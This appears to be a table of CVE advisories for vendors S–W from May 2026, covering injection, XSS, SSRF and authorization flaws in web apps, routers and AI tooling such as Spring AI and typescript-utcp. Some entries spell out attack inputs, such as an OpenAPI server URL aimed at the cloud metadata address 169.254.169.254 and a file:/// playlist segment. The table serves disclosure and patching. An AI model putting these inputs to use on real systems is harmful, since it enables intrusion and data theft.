| SourceCodester--CET Automated Grading System with AI Predictive Analytics | A weakness has been identified in SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0. This impacts an unknown function of the file /index.php of the component SQL Handler. Executing a manipulation can lead to information exposure through error message. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. | 2026-05-26 | 4.3 | CVE-2026-9583 |
| SourceCodester--eDoc Doctor Appointment System | A security vulnerability has been detected in SourceCodester eDoc Doctor Appointment System 1.0. This affects an unknown part of the file /admin/delete-session.php. The manipulation of the argument ID leads to missing authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2026-05-26 | 6.5 | CVE-2026-9603 |
| SourceCodester--Indian Invoicing System | A vulnerability was found in SourceCodester Indian Invoicing System 1.0. This issue affects some unknown processing of the file /Invoicing/IGST_Invoice.php of the component Invoice Generation Handler. Performing a manipulation of the argument customer_name/category results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2026-05-25 | 6.3 | CVE-2026-9411 |
| SourceCodester--Indian Invoicing System | A vulnerability was determined in SourceCodester Indian Invoicing System 1.0. Impacted is an unknown function of the component Backend Endpoint. Executing a manipulation can lead to improper access controls. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. Multiple endpoints are affected. | 2026-05-25 | 6.3 | CVE-2026-9412 |
| SourceCodester--Indian Invoicing System | A vulnerability was identified in SourceCodester Indian Invoicing System 1.0. The affected element is an unknown function of the file /Invoicing/category.php. The manipulation of the argument msg leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-05-25 | 4.3 | CVE-2026-9413 |
| SourceCodester--Simple POS and Inventory System | A flaw has been found in SourceCodester Simple POS and Inventory System 1.0. Impacted is an unknown function of the file /admin/addproduct.php of the component File Extension Handler. This manipulation of the argument image causes unrestricted upload. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-05-25 | 6.3 | CVE-2026-9445 |
| SourceCodester--Simple POS and Inventory System | A vulnerability was detected in SourceCodester Simple POS and Inventory System 1.0. This issue affects the function delete of the file /admin/deleteproduct.php of the component GET Parameter Handler. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-05-25 | 4.7 | CVE-2026-9444 |
| SourceCodester--Simple POS and Inventory System | A vulnerability has been found in SourceCodester Simple POS and Inventory System 1.0. The affected element is an unknown function of the file /admin/edit_customer.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-05-25 | 4.7 | CVE-2026-9446 |
| SourceCodester--Student Grades Management System | A vulnerability was found in SourceCodester Student Grades Management System 1.0. Affected is an unknown function of the file grades.php. Performing a manipulation of the argument student_id results in improper authorization. The attack may be initiated remotely. The exploit has been made public and could be used. | 2026-05-25 | 6.3 | CVE-2026-9483 |
| SourceCodester--Student Grades Management System | A vulnerability was determined in SourceCodester Student Grades Management System 1.0. Affected by this vulnerability is the function getClassroomStudents/removeStudentFromClassroom of the file classroom.php. Executing a manipulation of the argument classroom_id can lead to improper authorization. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 6.3 | CVE-2026-9484 |
| SourceCodester--Student Grades Management System | A security flaw has been discovered in SourceCodester Student Grades Management System 1.0. This affects an unknown part. The manipulation results in cross-site request forgery. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 4.3 | CVE-2026-9486 |
| SpabRice--Nyla | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in SpabRice Nyla allows Code Injection. This issue affects Nyla: from n/a through 1.7. | 2026-05-26 | 5.3 | CVE-2026-39642 |
| Spring--Spring AI | Spring AI's support for Anthropic's Skills API used LLM-influenced filenames unsanitized in Path.resolve before writing files to disk. This could allow a malicious user to write files outside the intended target directory, including restricted directories. Affected versions: Spring AI: 1.1.0 through 1.1.x | 2026-05-25 | 6.5 | CVE-2026-41863 |
| Squirrel--Squirrel | A security flaw has been discovered in Squirrel up to 3.2. Impacted is the function ReadObject of the file squirrel/sqobject.cpp of the component Cnut File Handler. Performing a manipulation results in heap-based buffer overflow. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 5.3 | CVE-2026-9541 |
| statamic--cms | Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.73.22 and 6.18.1, the Glide image proxy's URL validation could be bypassed using an IP representation that wasn't normalized before the public-IP check. An unauthenticated user could cause the server to make HTTP requests to internal addresses - including loopback, private network, and cloud metadata endpoints. This affects sites that pass user-supplied URLs to Glide. Sites running PHP 8.3 or newer are not affected. This vulnerability is fixed in 5.73.22 and 6.18.1. | 2026-05-29 | 5.4 | CVE-2026-45660 |
| statcounter--StatCounter Free Real Time Visitor Stats | The StatCounter - Free Real Time Visitor Stats plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.1 This is due to insufficient output escaping on the post author's nickname in the statcounter_addToTags() function. The function is hooked to wp_head and fires on every single post page. It retrieves the post author's nickname via the_author_meta() and echoes it directly into a JavaScript double-quoted string context inside a <script> block without applying esc_js() or any equivalent JavaScript-context escaping. This makes it possible for authenticated attackers with Author-level access and above to inject arbitrary web scripts into pages that will execute whenever any user (including unauthenticated visitors) accesses a post authored by the attacker. | 2026-05-29 | 6.4 | CVE-2026-6275 |
| Stokedonit--Notebook Pro | Notebook Pro 2.0 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the notebook name field. Attackers can create a malicious text file containing 500 or more characters, paste the content into the New Notebook Name field, and trigger an application crash when attempting to create and save the notebook. | 2026-05-25 | 6.2 | CVE-2018-25378 |
| stonith404--pingvin-share | A security flaw has been discovered in stonith404 pingvin-share up to 1.13.0. This affects the function getServerSideProps of the file frontend/src/pages/auth/signIn.tsx of the component Sign-in Auto-Redirect. The manipulation of the argument redirect results in cross site scripting. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 4.3 | CVE-2026-9519 |
| Strategy11 Team--AWP Classifieds | Missing Authorization vulnerability in Strategy11 Team AWP Classifieds another-wordpress-classifieds-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AWP Classifieds: from n/a through <= 4.4.5. | 2026-05-27 | 6.5 | CVE-2026-42726 |
| streamlink--streamlink | Streamlink is a CLI utility which pipes video streams from various services into a video player. Prior to 8.4.0, Streamlink's HLS and DASH parsers do not validate the URI scheme of segment entries and other resources. A remote .m3u8 HLS playlist or .mpd DASH manifest can list file:///path/to/file as a segment, and streamlink will read that local file and write its contents to the output stream. This vulnerability is fixed in 8.4.0. | 2026-05-27 | 6.5 | CVE-2026-44353 |
| Sushmi-pal--Invoice-System | A flaw has been found in Sushmi-pal Invoice-System up to a0a3faa16dee2621b231ae227333f5761607283b. This affects an unknown part of the file /user of the component User Management Handler. This manipulation of the argument role causes improper authorization. It is possible to initiate the attack remotely. The exploit has been published and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.3 | CVE-2026-9409 |
| Sushmi-pal--Invoice-System | A vulnerability has been found in Sushmi-pal Invoice-System up to a0a3faa16dee2621b231ae227333f5761607283b. This vulnerability affects unknown code of the file /profile of the component Profile Workflow. Such manipulation of the argument ID leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.3 | CVE-2026-9410 |
| Synology--ActiveProtect Agent | Origin validation error vulnerability in Synology ActiveProtect Agent before 1.1.0-0439 allows local users to write arbitrary files with restricted content when installing. | 2026-05-27 | 6.1 | CVE-2025-13593 |
| Synology--BeeDrive for desktop | Files or directories accessible to external parties vulnerability in redis-server component in Synology BeeDrive for desktop before 1.3.2-13814 allows local users to conduct denial-of-service attacks via unspecified vectors. | 2026-05-27 | 6.8 | CVE-2024-11399 |
| Synology--Safe Access | Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in Safe Access in Synology Safe Access before 1.3.1-0329 allows remote authenticated users with administrator privileges to read or write specific files containing non-sensitive information or conduct limited denial-of-service in SRM. | 2026-05-27 | 5.9 | CVE-2025-10466 |
| Synology--Storage Manager | A use of get request method with sensitive query strings vulnerability in volume encryption of Synology Storage Manager package before 1.0.1-1100 allows local attackers to obtain sensitive information. | 2026-05-27 | 6.2 | CVE-2026-2237 |
| Synology--Surveillance Station | Missing authorization vulnerability in AddOns functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to obtain sensitive information via unspecified vectors. | 2026-05-27 | 4.9 | CVE-2024-47268 |
| Synology--Surveillance Station | Cleartext transmission of sensitive information vulnerability in Export Key functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to obtain sensitive information via unspecified vectors. | 2026-05-27 | 4.9 | CVE-2024-47269 |
| Synology--Surveillance Station | Insufficiently protected credentials vulnerability in IPSpeaker component in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to obtain sensitive information via unspecified vectors. | 2026-05-27 | 4.9 | CVE-2024-47271 |
| Synology--Synology Active Backup for Business Agent | An origin validation error vulnerability in Synology Active Backup for Business Agent before 3.1.0-4967 allows local users to write arbitrary files with restricted content during installation. | 2026-05-27 | 6.1 | CVE-2025-66592 |
| Synology--Synology Assistant | An origin validation error vulnerability in Synology Assistant before 7.0.6-50085 allows local users to write arbitrary files with restricted content during installation. | 2026-05-27 | 6.1 | CVE-2025-66593 |
| Synology--Synology Contacts | Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in contact functionality in Synology Contacts before 1.0.10-20659 allows remote authenticated users to read or write specific files containing non-sensitive information via unspecified vectors. | 2026-05-27 | 5.4 | CVE-2025-13167 |
| TaleLin--lin-cms-spring-boot | A vulnerability was detected in TaleLin lin-cms-spring-boot up to 0.2.1. This issue affects some unknown processing of the file src/main/java/io/github/talelin/latticy/controller/v1/BookController.java of the component book Endpoint. The manipulation results in improper access controls. The attack may be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-30 | 6.3 | CVE-2026-10152 |
| Tanium--Tanium Server | Tanium addressed a denial of service vulnerability in Tanium Server. | 2026-05-27 | 6.5 | CVE-2026-9156 |
| teableio--teable | A vulnerability was identified in teableio teable up to 1.9.x. This impacts an unknown function of the file apps/nextjs-app/src/features/auth/pages/LoginPage.tsx of the component Sign-up. The manipulation of the argument redirect leads to cross site scripting. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Upgrading to version release.2026-04-21T08-57-20Z.1513 will fix this issue. The affected component should be upgraded. The vendor confirms: "The default branch of teableio/teable is develop, and the reported login redirect issue has already been fixed there. The login redirect flow now validates the redirect parameter with isValidRedirectPath() before navigation, which blocks javascript:, data:, and cross-origin redirects." | 2026-05-26 | 4.3 | CVE-2026-9566 |
| TeamSpeak--TeamSpeak 3 Server | A weakness has been identified in TeamSpeak 3 Server up to 3.13.7. This affects the function process_resend_queue of the component Connection State Management. This manipulation causes use after free. The attack may be initiated remotely. Upgrading to version 3.13.8 is able to mitigate this issue. The affected component should be upgraded. | 2026-05-27 | 5.4 | CVE-2026-4390 |
| TeamSpeak--TeamSpeak 3 Server | A security vulnerability has been detected in TeamSpeak 3 Server up to 3.13.7. This vulnerability affects unknown code of the component ECC Key Parser. Such manipulation leads to heap-based buffer overflow. The attack may be launched remotely. Upgrading to version 3.13.8 is able to resolve this issue. It is suggested to upgrade the affected component. | 2026-05-27 | 5.3 | CVE-2026-4391 |
| TeamSpeak--TeamSpeak 3 Server | A vulnerability was detected in TeamSpeak 3 Server up to 3.13.7. This issue affects some unknown processing of the component clientek Handshake Handler. Performing a manipulation of the argument proof results in reachable assertion. Remote exploitation of the attack is possible. Upgrading to version 3.13.8 is capable of addressing this issue. Upgrading the affected component is recommended. | 2026-05-27 | 5.3 | CVE-2026-4392 |
| TeconceTheme--Mayosis Core | Missing Authorization vulnerability in TeconceTheme Mayosis Core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Mayosis Core: from n/a through 5.4.7. | 2026-05-26 | 5.3 | CVE-2026-39655 |
| Tenda--W12 | A vulnerability was found in Tenda W12 3.0.0.7(4763). This issue affects the function cgiSysWebTimeoutSet of the file /bin/httpd of the component Web Management Interface. The manipulation of the argument web_over_time results in denial of service. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2026-05-31 | 6.5 | CVE-2026-10190 |
| Themeansar--Newses | Missing Authorization vulnerability in Themeansar Newses allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Newses: from n/a through 2.0.0.77. | 2026-05-25 | 5.4 | CVE-2026-24586 |
| ThemeHigh--Stripe Payment Gateway for WooCommerce | Authentication Bypass Using an Alternate Path or Channel vulnerability in ThemeHigh Stripe Payment Gateway for WooCommerce allows Password Recovery Exploitation. This issue affects Stripe Payment Gateway for WooCommerce: from n/a through 5.0.7. | 2026-05-25 | 6.5 | CVE-2026-45217 |
| themeisle--Visualizer: Tables and Charts Manager for WordPress | The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.11.14. This is due to a missing capability check on the renderChartPages() and uploadData() functions, where the wp_ajax_visualizer-create-chart and wp_ajax_visualizer-edit-chart AJAX actions invoke renderChartPages() without any current_user_can() check, and wp_ajax_visualizer-upload-data invokes uploadData() which also lacks a capability check and validates its nonce without an action argument, making it trivially bypassable. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary chart posts and access or modify chart data belonging to other users, including administrators. | 2026-05-28 | 4.3 | CVE-2026-8689 |
| themesuite--Automotive Car Dealership Business WordPress Theme | The Automotive Car Dealership Business WordPress Theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Project Details' custom field in Portfolio Items in all versions up to, and including, 13.4.1. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the 'project_details' custom field. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-29 | 6.4 | CVE-2025-14042 |
| ThingsBoard--ThingsBoard | A weakness has been identified in ThingsBoard up to 4.3.1.1. Affected by this vulnerability is the function getGatewayDockerComposeFile of the file /api/v1/provision of the component YAML Handler. This manipulation causes code injection. It is possible to initiate the attack remotely. The attack's complexity is rated as high. The exploitation appears to be difficult. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-26 | 5 | CVE-2026-9568 |
| thomstark--Formidable Kinetic | The Formidable Kinetic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'kinetic_link' shortcode in versions up to, and including, 1.1.01. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (notably 'window', 'class', and 'label') in the FrmKinetic::link() function, which are concatenated directly into HTML attributes of an anchor tag. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8871 |
| Tiandy--Easy7 Integrated Management Platform | A vulnerability was determined in Tiandy Easy7 Integrated Management Platform 7.17.0. This issue affects some unknown processing of the file /rest/user/updateUserPassword of the component API Endpoint. Executing a manipulation can lead to weak password recovery. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 5.3 | CVE-2026-9466 |
| Tom--GenerateBlocks | Insertion of Sensitive Information Into Sent Data vulnerability in Tom GenerateBlocks allows Retrieve Embedded Sensitive Data. This issue affects GenerateBlocks: from n/a through 2.1.0. | 2026-05-27 | 6.5 | CVE-2026-48877 |
| Totolink--CA750-PoE | A vulnerability was identified in Totolink CA750-PoE 6.2c.510. This affects the function setWebWlanIdx of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Such manipulation of the argument webWlanIdx leads to os command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-05-25 | 6.3 | CVE-2026-9511 |
| Totolink--CA750-PoE | A security flaw has been discovered in Totolink CA750-PoE 6.2c.510. This vulnerability affects the function setPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Performing a manipulation of the argument admuser/admpass results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 6.3 | CVE-2026-9512 |
| Totolink--CA750-PoE | A weakness has been identified in Totolink CA750-PoE 6.2c.510. This issue affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Executing a manipulation of the argument host_time can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 6.3 | CVE-2026-9513 |
| Totolink--CA750-PoE | A security vulnerability has been detected in Totolink CA750-PoE 6.2c.510. Impacted is the function setNetworkDiag of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument NetDiagHost/NetDiagPingNum/NetDiagPingSize/NetDiagPingTimeOut/NetDiagTracertHop is directly passed by the attacker/so we can control the NetDiagHost/NetDiagPingNum/NetDiagPingSize/NetDiagPingTimeOut/NetDiagTracertHop leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-05-25 | 6.3 | CVE-2026-9514 |
| Totolink--CA750-PoE | A vulnerability was detected in Totolink CA750-PoE 6.2c.510. The affected element is the function setUnloadUserData of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument plugin_version results in os command injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-05-25 | 6.3 | CVE-2026-9515 |
| Totolink--CA750-PoE | A weakness has been identified in Totolink CA750-PoE 6.2c.510. Impacted is the function setUpgradeUboot of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. This manipulation of the argument FileName causes os command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-26 | 6.3 | CVE-2026-9531 |
| Totolink--CA750-PoE | A security vulnerability has been detected in Totolink CA750-PoE 6.2c.510. The affected element is the function setUploadUserData of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Such manipulation of the argument FileName leads to os command injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2026-05-26 | 6.3 | CVE-2026-9532 |
| Totolink--CA750-PoE | A vulnerability was detected in Totolink CA750-PoE 6.2c.510. The impacted element is the function recvUpgradeNewFw of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Performing a manipulation of the argument fwUrl/magicid results in os command injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-05-26 | 6.3 | CVE-2026-9533 |
| Totolink--CA750-PoE | A flaw has been found in Totolink CA750-PoE 6.2c.510. This affects the function setWiFiWpsConfig of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Executing a manipulation of the argument PIN can lead to os command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-05-26 | 6.3 | CVE-2026-9534 |
| TRENDnet--TEW-432BRP | A vulnerability has been found in TRENDnet TEW-432BRP 3.10B20. This impacts the function formSetRoute of the file /goform/formSetRoute. The manipulation of the argument ip/mask/gateway leads to command injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 6.3 | CVE-2026-10060 |
| TRENDnet--TEW-432BRP | A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. Affected is the function formWPS of the file /goform/formWPS. The manipulation of the argument peerPin results in command injection. The attack can be executed remotely. The exploit has been made public and could be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 6.3 | CVE-2026-10061 |
| TRENDnet--TEW-432BRP | A security flaw has been discovered in TRENDnet TEW-432BRP 3.10B20. This affects the function formSetPortTr of the file /goform/formSetPortTr. Performing a manipulation of the argument special_name results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 6.3 | CVE-2026-10064 |
| TRENDnet--TEW-432BRP | A vulnerability has been found in TRENDnet TEW-432BRP 3.10B20. Impacted is the function formSysCmd of the file /goform/formSysCmd. Such manipulation of the argument sysCmd leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 6.3 | CVE-2026-10180 |
| TRENDnet--TEW-432BRP | A vulnerability was determined in TRENDnet TEW-432BRP 3.10B20. The impacted element is the function formWlanSetup of the file /goform/formWlanSetup. Executing a manipulation of the argument enrollee can lead to command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 6.3 | CVE-2026-10182 |
| universal-tool-calling-protocol--typescript-utcp | typescript-utcp is a typescript implementation of UTCP. Prior to 1.1.2, the @utcp/http package is vulnerable to a blind Server-Side Request Forgery (SSRF) caused by a trust-boundary inconsistency between manual discovery and tool invocation. registerManual() validates the discovery URL against an HTTPS / loopback allowlist, but callTool() reuses the resolved toolCallTemplate.url directly without revalidating, and the OpenApiConverter blindly trusts whatever servers[0].url an attacker-hosted spec declares. An attacker who hosts a malicious OpenAPI spec on a legitimate HTTPS endpoint can declare e.g. servers: [{ url: "http://127.0.0.1:9090" }] or servers: [{ url: "http://169.254.169.254" }]; the converter then produces tools whose URL points at internal services on the agent host. This vulnerability is fixed in 1.1.2. | 2026-05-28 | 4.7 | CVE-2026-45366 |
| VideoWhisper.com--Paid Videochat Turnkey Site | Missing Authorization vulnerability in VideoWhisper.Com Paid Videochat Turnkey Site allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Paid Videochat Turnkey Site: from n/a through 7.3.23. | 2026-05-26 | 5.3 | CVE-2026-24590 |
| ViewComponent--view_component | view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. From 3.0.0 to 4.9.0, the preview route derives an example name from the URL and calls it with public_send. The code does not verify that the requested method is one of the preview examples explicitly defined by the preview class. As a result, inherited public methods on ViewComponent::Preview are route-reachable. The most important one is render_with_template, which accepts template: and locals:. Those values can come from request params and are later passed to Rails as render template:. If previews are exposed, an attacker can render internal Rails templates that are not otherwise routable. This vulnerability is fixed in 4.9.0. | 2026-05-26 | 6.5 | CVE-2026-44836 |
| ViewComponent--view_component | view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. From 3.0.0 to 4.9.0, the system test entrypoint canonicalizes a user-controlled file path with File.realpath, then checks whether the resolved path starts with the temp directory path. This is not a safe containment check because sibling directories can share the same string prefix. This vulnerability is fixed in 4.9.0. | 2026-05-26 | 5.9 | CVE-2026-44837 |
| vinaysankhyan--iWR Tooltip | The iWR Tooltip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `iwrtooltip` shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied attributes in the iwr_tooltip() shortcode handler - the `title` attribute is concatenated directly into an HTML attribute without esc_attr() or any other escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8894 |
| vincentastolfi--Shortcode Buddy | The Shortcode Buddy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 0.1.9.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8897 |
| vllm-project--vllm | A vulnerability was identified in vllm-project vllm 0.19.0. This issue affects some unknown processing of the component OpenAI-compatible Serving Path. Such manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The pull request to fix this issue awaits acceptance. | 2026-05-26 | 5.3 | CVE-2026-9540 |
| volcano-sh--volcano | Volcano is a Kubernetes-native batch scheduling system. Prior to v1.14.2, v1.13.3, and v1.12.4, the Volcano webhook server does not enforce a size limit on incoming HTTP request bodies. Any in-cluster pod that can reach the webhook endpoint may send an arbitrarily large request body, potentially causing the webhook server to be killed by OOM. All Volcano deployments with the webhook server exposed to in-cluster traffic are affected. This vulnerability is fixed in v1.14.2, v1.13.3, and v1.12.4. | 2026-05-27 | 6.8 | CVE-2026-44247 |
| VowpalWabbit--vowpal_wabbit | Vowpal Wabbit is a machine learning system. The workflow .github/workflows/python_checks.yml embeds ${{ github.event.pull_request.title }} directly inside double-quoted bash strings in four separate steps across four jobs, each passing it as a CLI argument to the Python test script run_tests_model_gen_and_load.py. The shell interprets the expanded string before invoking Python, allowing an attacker to break out of the quotes and execute arbitrary commands on the runner. The pull_request trigger fires on PRs targeting any branch (branches: ['*']), with no additional access gate. This vulnerability is fixed by the 998e390e80a7e8192d7849b7784bc113dbd190ad commit. | 2026-05-26 | 5 | CVE-2026-44723 |
| Webful Creations--RepairBuddy | Missing Authorization vulnerability in Webful Creations RepairBuddy allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects RepairBuddy: from n/a through 4.1121. | 2026-05-26 | 4.3 | CVE-2026-24638 |
| Webmin--Webmin | Webmin before 2.640 allows mailboxes/detach.cgi XSS via an SVG document attachment that is viewed in the mailboxes component, because image/svg+xml is used instead of a safe type (e.g., text/plain). | 2026-05-27 | 6.1 | CVE-2026-49102 |
| WebToffee--Product Import Export for WooCommerce | Missing Authorization vulnerability in WebToffee Product Import Export for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Product Import Export for WooCommerce: from n/a through 2.5.6. | 2026-05-27 | 4.3 | CVE-2026-48971 |
| westboy--CicadasCMS | A flaw has been found in westboy CicadasCMS up to 2431154dac8d0735e04f1fd2a3c3556668fc8dab. Impacted is the function Search of the file org/springframework/cache/support/AbstractCacheManager.java. This manipulation of the argument s causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-30 | 4.3 | CVE-2026-10153 |
| wikidforum--Wikidforum | Wikidforum 2.20 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted HTML in the reply_text parameter. Attackers can post comments containing JavaScript code through the rpc.php endpoint that executes in other users' browsers when viewing forum replies. | 2026-05-29 | 5.4 | CVE-2018-25384 |
| Wireshark Foundation--Wireshark | ROHC protocol dissector crash in Wireshark 4.6.0 to 4.6.5 and 4.4.0 to 4.4.15 allows denial of service | 2026-05-27 | 5.5 | CVE-2026-9759 |
| wmark--CDN Linker lite | The CDN Linker lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on the ossdl_off_options() function. This makes it possible for unauthenticated attackers to update the plugin's settings - including the CDN URL used to rewrite all static asset references on the site - via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8941 |
| WP Chill--RSVP and Event Management | Missing Authorization vulnerability in WP Chill RSVP and Event Management allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects RSVP and Event Management: from n/a through 2.7.16. | 2026-05-25 | 5.3 | CVE-2026-27398 |
| WP Media--Adminimize | Missing Authorization vulnerability in WP Media Adminimize allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Adminimize: from n/a through 1.11.11. | 2026-05-27 | 4.3 | CVE-2026-49045 |
| WP Sunshine--Sunshine Photo Cart | Missing Authorization vulnerability in WP Sunshine Sunshine Photo Cart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sunshine Photo Cart: from n/a through 3.6.7. | 2026-05-25 | 6.3 | CVE-2026-42776 |
| WP Wham--Checkout Files Upload for WooCommerce | Authorization Bypass Through User-Controlled Key vulnerability in WP Wham Checkout Files Upload for WooCommerce checkout-files-upload-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Checkout Files Upload for WooCommerce: from n/a through <= 2.2.5. | 2026-05-27 | 6.5 | CVE-2026-42725 |
| WpDevArt--Organization chart | Cross-Site Request Forgery (CSRF) vulnerability in WpDevArt Organization chart allows Cross Site Request Forgery. This issue affects Organization chart: from n/a through 1.7.5. | 2026-05-25 | 4.3 | CVE-2026-24597 |
| wpdevelop--Booking Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevelop Booking Manager booking-manager allows Stored XSS.This issue affects Booking Manager: from n/a through <= 2.1.18. | 2026-05-27 | 6.5 | CVE-2026-42751 |
| wpengine--Advanced Custom Fields (ACF) | The Advanced Custom Fields (ACF®) plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.8.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to overwrite the post_title and post_content of any post bound to a publicly accessible acf_form() instance by injecting values into the _post_title and _post_content parameters of a form submission request. | 2026-05-31 | 5.3 | CVE-2026-8382 |
